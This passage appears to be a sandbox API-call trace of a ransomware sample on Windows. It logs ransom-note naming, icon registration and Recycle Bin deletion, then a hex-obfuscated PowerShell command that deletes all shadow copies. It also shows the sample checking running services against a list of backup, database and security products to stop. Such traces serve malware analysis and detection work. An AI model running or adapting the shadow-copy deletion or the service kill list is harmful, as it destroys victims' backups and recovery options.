lpData="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpcbData=0x32f99c*=0x4a) returned 0x0 [0062.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", cchWideChar=-1, lpMultiByteStr=0x32f95c, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpUsedDefaultChar=0x0) returned 37 [0062.106] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32f95c, Length=0x25) returned 0xee6053d7 [0062.106] RtlComputeCrc32 (PartialCrc=0x53d7, Buffer=0x32f95c, Length=0x25) returned 0x119b9ad1 [0062.106] RtlComputeCrc32 (PartialCrc=0x9ad1, Buffer=0x32f95c, Length=0x25) returned 0x7dcfdcc8 [0062.106] RtlComputeCrc32 (PartialCrc=0xdcc8, Buffer=0x32f95c, Length=0x25) returned 0x2aa4d67d [0062.106] RtlComputeCrc32 (PartialCrc=0xd67d, Buffer=0x32f95c, Length=0x25) returned 0x32684d7f [0062.106] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0xcb1008, Length=0x10) returned 0x55f9a042 [0062.106] RtlComputeCrc32 (PartialCrc=0xa042, Buffer=0xcb1008, Length=0x10) returned 0xc7642d9a [0062.106] RtlComputeCrc32 (PartialCrc=0x2d9a, Buffer=0xcb1008, Length=0x10) returned 0x7b1717a3 [0062.106] RtlComputeCrc32 (PartialCrc=0x17a3, Buffer=0xcb1008, Length=0x10) returned 0x685a173d [0062.106] RtlComputeCrc32 (PartialCrc=0x173d, Buffer=0xcb1008, Length=0x10) returned 0xb56a8cb3 [0062.106] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0xcb1008, Length=0x10) returned 0xde887336 [0062.106] RtlComputeCrc32 (PartialCrc=0x7336, Buffer=0xcb1008, Length=0x10) returned 0xa6e2b707 [0062.107] RtlComputeCrc32 (PartialCrc=0xb707, Buffer=0xcb1008, Length=0x10) returned 0xf066c4d7 [0062.107] RtlComputeCrc32 (PartialCrc=0xc4d7, Buffer=0xcb1008, Length=0x10) returned 0x3308edfb [0062.107] RtlComputeCrc32 (PartialCrc=0xedfb, Buffer=0xcb1008, Length=0x10) returned 0x506de194 [0062.107] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0xcb1008, Length=0x10) returned 0xffa4f3dc [0062.107] RtlComputeCrc32 (PartialCrc=0xf3dc, Buffer=0xcb1008, Length=0x10) returned 0xd13f668c [0062.107] RtlComputeCrc32 (PartialCrc=0x668c, Buffer=0xcb1008, Length=0x10) returned 0xd14a443d [0062.107] RtlComputeCrc32 (PartialCrc=0x443d, Buffer=0xcb1008, Length=0x10) returned 0xfabbb008 [0062.107] RtlComputeCrc32 (PartialCrc=0xb008, Buffer=0xcb1008, Length=0x10) returned 0x92e0d151 [0062.107] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1513c8) returned 1 [0062.107] RegCloseKey (hKey=0xb8) returned 0x0 [0062.107] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x145b80) returned 1 [0062.107] _swprintf (in: param_1=0xcb0a1a, param_2="README%s.TXT" | out: param_1="README.c06622a1.TXT") returned 19 [0062.107] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x32f590, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0062.114] PathAddBackslashW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\") returned="" [0062.115] wcscat (in: _Dest=0x32f590, _Source="c06622a1" | out: _Dest="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1" [0062.115] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0xa) returned 0x150f48 [0062.115] wcscat (in: _Dest=0x32f590, _Source=".ico" | out: _Dest="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico" [0062.115] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x150f48) returned 1 [0062.115] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x16b9) returned 0x151bb0 [0062.115] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x5ae40) returned 0x17efd8 [0062.117] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\c06622a1.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0062.120] WriteFile (in: hFile=0x108, lpBuffer=0x17efd8*, nNumberOfBytesToWrite=0x86be, lpNumberOfBytesWritten=0x32f560, lpOverlapped=0x0 | out: lpBuffer=0x17efd8*, lpNumberOfBytesWritten=0x32f560*=0x86be, lpOverlapped=0x0) returned 1 [0062.123] CloseHandle (hObject=0x108) returned 1 [0062.125] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x151bb0) returned 1 [0062.125] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x17efd8) returned 1 [0062.125] RegCreateKeyExW (in: hKey=0x80000000, lpSubKey=".c06622a1", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2000000, lpSecurityAttributes=0x0, phkResult=0x32f9a4, lpdwDisposition=0x0 | out: phkResult=0x32f9a4*=0x10e, lpdwDisposition=0x0) returned 0x0 [0062.129] wcslen (_String="c06622a1") returned 0x8 [0062.129] RegSetValueExW (in: hKey=0x10e, lpValueName="", Reserved=0x0, dwType=0x1, lpData="c06622a1", cbData=0x12 | out: lpData="c06622a1") returned 0x0 [0062.130] RegCloseKey (hKey=0x10e) returned 0x0 [0062.130] wcscpy (in: _Dest=0x32f798, _Source="c06622a1" | out: _Dest="c06622a1") returned="c06622a1" [0062.130] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x1a) returned 0x14e730 [0062.130] wcscat (in: _Dest=0x32f798, _Source="\\DefaultIcon" | out: _Dest="c06622a1\\DefaultIcon") returned="c06622a1\\DefaultIcon" [0062.130] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x14e730) returned 1 [0062.130] RegCreateKeyExW (in: hKey=0x80000000, lpSubKey="c06622a1\\DefaultIcon", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2000000, lpSecurityAttributes=0x0, phkResult=0x32f9a4, lpdwDisposition=0x0 | out: phkResult=0x32f9a4*=0x112, lpdwDisposition=0x0) returned 0x0 [0062.132] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico") returned 0x38 [0062.132] RegSetValueExW (in: hKey=0x112, lpValueName="", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico", cbData=0x72 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\c06622a1.ico") returned 0x0 [0062.133] SHChangeNotify (wEventId=134217728, uFlags=0x1000, dwItem1=0x0, dwItem2=0x0) [0063.876] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\idfoodsf.exe\" " [0063.876] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\idfoodsf.exe\" ", pNumArgs=0x32f9b8 | out: pNumArgs=0x32f9b8) returned 0x155e98*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\idfoodsf.exe" [0063.876] SetThreadExecutionState (esFlags=0x80000001) returned 0x80000000 [0063.877] GetSystemDefaultUILanguage () returned 0x409 [0063.883] GetUserDefaultLangID () returned 0x409 [0063.883] GetLogicalDriveStringsW (in: nBufferLength=0x80, lpBuffer=0x32f86c | out: lpBuffer="C:\\") returned 0x4 [0063.883] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.883] wcscpy (in: _Dest=0x32f974, _Source="C:\\" | out: _Dest="C:\\") returned="C:\\" [0063.883] wcscpy (in: _Dest=0x32efb4, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0063.883] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0063.883] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\*recycle*", fInfoLevelId=0x0, lpFindFileData=0x32ed64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed64) returned 0x152030 [0063.884] wcscpy (in: _Dest=0x32f1e8, _Source="\\\\?\\C:\\" | out: _Dest="\\\\?\\C:\\") returned="\\\\?\\C:\\" [0063.884] wcslen (_String="\\\\?\\C:\\") returned 0x7 [0063.884] wcscpy (in: _Dest=0x32f1f6, _Source="$Recycle.Bin" | out: _Dest="$Recycle.Bin") returned="$Recycle.Bin" [0063.884] FindClose (in: hFindFile=0x152030 | out: hFindFile=0x152030) returned 1 [0063.884] wcscpy (in: _Dest=0x32f3f0, _Source="\\\\?\\C:\\$Recycle.Bin" | out: _Dest="\\\\?\\C:\\$Recycle.Bin") returned="\\\\?\\C:\\$Recycle.Bin" [0063.884] wcslen (_String="\\\\?\\C:\\$Recycle.Bin") returned 0x13 [0063.884] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-*", fInfoLevelId=0x0, lpFindFileData=0x32f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32f5f8) returned 0x152030 [0063.884] wcscpy (in: _Dest=0x32f1e8, _Source="\\\\?\\C:\\$Recycle.Bin\\S-*" | out: _Dest="\\\\?\\C:\\$Recycle.Bin\\S-*") returned="\\\\?\\C:\\$Recycle.Bin\\S-*" [0063.884] wcscpy (in: _Dest=0x32f210, _Source="S-1-5-21-3388679973-3930757225-3770151564-1000" | out: _Dest="S-1-5-21-3388679973-3930757225-3770151564-1000") returned="S-1-5-21-3388679973-3930757225-3770151564-1000" [0063.884] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1561c0 [0063.884] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x1661c8 [0063.885] wcscpy (in: _Dest=0x1561c0, _Source="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" | out: _Dest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000" [0063.885] wcslen (_String="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 0x42 [0063.885] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", fInfoLevelId=0x0, lpFindFileData=0x32ef6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ef6c) returned 0x152070 [0063.885] FindNextFileW (in: hFindFile=0x152070, lpFindFileData=0x32ef6c | out: lpFindFileData=0x32ef6c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.887] FindNextFileW (in: hFindFile=0x152070, lpFindFileData=0x32ef6c | out: lpFindFileData=0x32ef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0063.887] wcscpy (in: _Dest=0x1661c8, _Source="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" | out: _Dest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0063.887] wcslen (_String="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 0x42 [0063.887] wcscpy (in: _Dest=0x16624e, _Source="desktop.ini" | out: _Dest="desktop.ini") returned="desktop.ini" [0063.887] GetFileAttributesW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 0x26 [0063.887] DeleteFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini")) returned 1 [0063.890] FindNextFileW (in: hFindFile=0x152070, lpFindFileData=0x32ef6c | out: lpFindFileData=0x32ef6c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0063.890] FindClose (in: hFindFile=0x152070 | out: hFindFile=0x152070) returned 1 [0063.891] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1561c0) returned 1 [0063.891] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x1661c8) returned 1 [0063.891] FindNextFileW (in: hFindFile=0x152030, lpFindFileData=0x32f5f8 | out: lpFindFileData=0x32f5f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0063.891] FindClose (in: hFindFile=0x152030 | out: hFindFile=0x152030) returned 1 [0063.891] Wow64DisableWow64FsRedirection (in: OldValue=0x32f970 | out: OldValue=0x32f970*=0x0) returned 1 [0063.891] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8080000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x32f928*(cb=0x48, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32f918 | out: lpCommandLine="powershell -ep bypass -c \"(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s\"", lpProcessInformation=0x32f918*(hProcess=0x130, hThread=0x12c, dwProcessId=0x340, dwThreadId=0x76c)) returned 1 [0063.907] WaitForSingleObject (hHandle=0x130, dwMilliseconds=0xffffffff) returned 0x0 [0148.435] CloseHandle (hObject=0x130) returned 1 [0148.435] CloseHandle (hObject=0x12c) returned 1 [0148.435] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0148.435] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x14ee10 [0148.438] EnumServicesStatusExW (in: hSCManager=0x14ee10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x32f97c, lpServicesReturned=0x32f978, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x32f97c, lpServicesReturned=0x32f978, lpResumeHandle=0x0) returned 0 [0148.439] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x8, Size=0x486c) returned 0x1561c0 [0148.440] EnumServicesStatusExW (in: hSCManager=0x14ee10, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x3, lpServices=0x1561c0, cbBufSize=0x486c, pcbBytesNeeded=0x32f97c, lpServicesReturned=0x32f978, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x1561c0, pcbBytesNeeded=0x32f97c, lpServicesReturned=0x32f978, lpResumeHandle=0x0) returned 1 [0148.442] _wcslwr (in: _String=0x15a9f8 | out: _String="adobeflashplayerupdatesvc") returned="adobeflashplayerupdatesvc" [0148.442] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="vss") returned 0x0 [0148.442] wcslen (_String="vss") returned 0x3 [0148.442] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sql") returned 0x0 [0148.442] wcslen (_String="sql") returned 0x3 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sql$") returned 0x0 [0148.443] wcslen (_String="sql$") returned 0x4 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="mysql") returned 0x0 [0148.443] wcslen (_String="mysql") returned 0x5 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="mysql$") returned 0x0 [0148.443] wcslen (_String="mysql$") returned 0x6 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="svc$") returned 0x0 [0148.443] wcslen (_String="svc$") returned 0x4 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="memtas") returned 0x0 [0148.443] wcslen (_String="memtas") returned 0x6 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="mepocs") returned 0x0 [0148.443] wcslen (_String="mepocs") returned 0x6 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="sophos") returned 0x0 [0148.443] wcslen (_String="sophos") returned 0x6 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="veeam") returned 0x0 [0148.443] wcslen (_String="veeam") returned 0x5 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="backup") returned 0x0 [0148.443] wcslen (_String="backup") returned 0x6 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="MSExchange") returned 0x0 [0148.443] wcslen (_String="MSExchange") returned 0xa [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="MSExchange$") returned 0x0 [0148.443] wcslen (_String="MSExchange$") returned 0xb [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="WSBExchange") returned 0x0 [0148.443] wcslen (_String="WSBExchange") returned 0xb [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="PDVFSService") returned 0x0 [0148.443] wcslen (_String="PDVFSService") returned 0xc [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="BackupExecVSSProvider") returned 0x0 [0148.443] wcslen (_String="BackupExecVSSProvider") returned 0x15 [0148.443] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="BackupExecAgentAccelerator") returned 0x0 [0148.444] wcslen (_String="BackupExecAgentAccelerator") returned 0x1a [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="BackupExecAgentBrowser") returned 0x0 [0148.444] wcslen (_String="BackupExecAgentBrowser") returned 0x16 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="BackupExecDiveciMediaService") returned 0x0 [0148.444] wcslen (_String="BackupExecDiveciMediaService") returned 0x1c [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="BackupExecJobEngine") returned 0x0 [0148.444] wcslen (_String="BackupExecJobEngine") returned 0x13 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="BackupExecManagementService") returned 0x0 [0148.444] wcslen (_String="BackupExecManagementService") returned 0x1b [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="BackupExecRPCService") returned 0x0 [0148.444] wcslen (_String="BackupExecRPCService") returned 0x14 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxBlr") returned 0x0 [0148.444] wcslen (_String="GxBlr") returned 0x5 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxVss") returned 0x0 [0148.444] wcslen (_String="GxVss") returned 0x5 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxClMgrS") returned 0x0 [0148.444] wcslen (_String="GxClMgrS") returned 0x8 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxCVD") returned 0x0 [0148.444] wcslen (_String="GxCVD") returned 0x5 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxCIMgr") returned 0x0 [0148.444] wcslen (_String="GxCIMgr") returned 0x7 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GXMMM") returned 0x0 [0148.444] wcslen (_String="GXMMM") returned 0x5 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxVssHWProv") returned 0x0 [0148.444] wcslen (_String="GxVssHWProv") returned 0xb [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="GxFWD") returned 0x0 [0148.444] wcslen (_String="GxFWD") returned 0x5 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="SAPService") returned 0x0 [0148.444] wcslen (_String="SAPService") returned 0xa [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="SAP") returned 0x0 [0148.444] wcslen (_String="SAP") returned 0x3 [0148.444] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="SAP$") returned 0x0 [0148.444] wcslen (_String="SAP$") returned 0x4 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="SAPD$,SAPHostControl") returned 0x0 [0148.445] wcslen (_String="SAPD$,SAPHostControl") returned 0x14 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="SAPHostExec") returned 0x0 [0148.445] wcslen (_String="SAPHostExec") returned 0xb [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="QBCFMonitorService") returned 0x0 [0148.445] wcslen (_String="QBCFMonitorService") returned 0x12 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="QBDBMgrN") returned 0x0 [0148.445] wcslen (_String="QBDBMgrN") returned 0x8 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="QBIDPService") returned 0x0 [0148.445] wcslen (_String="QBIDPService") returned 0xc [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="AcronisAgent") returned 0x0 [0148.445] wcslen (_String="AcronisAgent") returned 0xc [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="VeeamNFSSvc") returned 0x0 [0148.445] wcslen (_String="VeeamNFSSvc") returned 0xb [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="VeeamDeploymentService") returned 0x0 [0148.445] wcslen (_String="VeeamDeploymentService") returned 0x16 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="VeeamTransportSvc") returned 0x0 [0148.445] wcslen (_String="VeeamTransportSvc") returned 0x11 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="MVArmor") returned 0x0 [0148.445] wcslen (_String="MVArmor") returned 0x7 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="MVarmor64") returned 0x0 [0148.445] wcslen (_String="MVarmor64") returned 0x9 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="VSNAPVSS") returned 0x0 [0148.445] wcslen (_String="VSNAPVSS") returned 0x8 [0148.445] wcsstr (_Str="adobeflashplayerupdatesvc", _SubStr="AcrSch2Svc") returned 0x0 [0148.445] wcslen (_String="AcrSch2Svc") returned 0xa [0148.445] _wcslwr (in: _String=0x15a99c | out: _String="aelookupsvc") returned="aelookupsvc" [0148.445] wcsstr (_Str="aelookupsvc", _SubStr="vss") returned 0x0 [0148.445] wcslen (_String="vss") returned 0x3 [0148.445] wcsstr (_Str="aelookupsvc", _SubStr="sql") returned 0x0 [0148.446] wcslen (_String="sql") returned 0x3 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="sql$") returned 0x0 [0148.446] wcslen (_String="sql$") returned 0x4 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="mysql") returned 0x0 [0148.446] wcslen (_String="mysql") returned 0x5 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="mysql$") returned 0x0 [0148.446] wcslen (_String="mysql$") returned 0x6 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="svc$") returned 0x0 [0148.446] wcslen (_String="svc$") returned 0x4 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="memtas") returned 0x0 [0148.446] wcslen (_String="memtas") returned 0x6 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="mepocs") returned 0x0 [0148.446] wcslen (_String="mepocs") returned 0x6 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="sophos") returned 0x0 [0148.446] wcslen (_String="sophos") returned 0x6 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="veeam") returned 0x0 [0148.446] wcslen (_String="veeam") returned 0x5 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="backup") returned 0x0 [0148.446] wcslen (_String="backup") returned 0x6 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="MSExchange") returned 0x0 [0148.446] wcslen (_String="MSExchange") returned 0xa [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="MSExchange$") returned 0x0 [0148.446] wcslen (_String="MSExchange$") returned 0xb [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="WSBExchange") returned 0x0 [0148.446] wcslen (_String="WSBExchange") returned 0xb [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="PDVFSService") returned 0x0 [0148.446] wcslen (_String="PDVFSService") returned 0xc [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="BackupExecVSSProvider") returned 0x0 [0148.446] wcslen (_String="BackupExecVSSProvider") returned 0x15 [0148.446] wcsstr (_Str="aelookupsvc", _SubStr="BackupExecAgentAccelerator") returned 0x0 [0148.447] wcslen (_String="BackupExecAgentAccelerator") returned 0x1a [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="BackupExecAgentBrowser") returned 0x0 [0148.447] wcslen (_String="BackupExecAgentBrowser") returned 0x16 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="BackupExecDiveciMediaService") returned 0x0 [0148.447] wcslen (_String="BackupExecDiveciMediaService") returned 0x1c [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="BackupExecJobEngine") returned 0x0 [0148.447] wcslen (_String="BackupExecJobEngine") returned 0x13 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="BackupExecManagementService") returned 0x0 [0148.447] wcslen (_String="BackupExecManagementService") returned 0x1b [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="BackupExecRPCService") returned 0x0 [0148.447] wcslen (_String="BackupExecRPCService") returned 0x14 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GxBlr") returned 0x0 [0148.447] wcslen (_String="GxBlr") returned 0x5 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GxVss") returned 0x0 [0148.447] wcslen (_String="GxVss") returned 0x5 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GxClMgrS") returned 0x0 [0148.447] wcslen (_String="GxClMgrS") returned 0x8 [0148.447] wcsstr (_Str="aelookupsvc", _SubStr="GxCVD") returned 0x0 [0148.447] wcslen 